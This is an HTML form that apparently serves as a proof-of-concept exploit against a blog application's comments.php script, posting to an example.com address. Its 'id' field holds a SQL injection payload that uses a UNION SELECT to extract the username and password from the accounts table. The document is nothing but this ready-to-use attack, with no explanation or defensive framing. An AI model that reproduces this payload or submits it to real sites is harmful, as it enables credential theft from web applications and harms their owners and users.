<form action="http://www.example.com/dcfmblog/comments.php" method="post"> <input type="text" name="id" size=50 value="-99' union select 0,username,password from accounts where id=1/*"> <input type="submit" value=" send "> </form>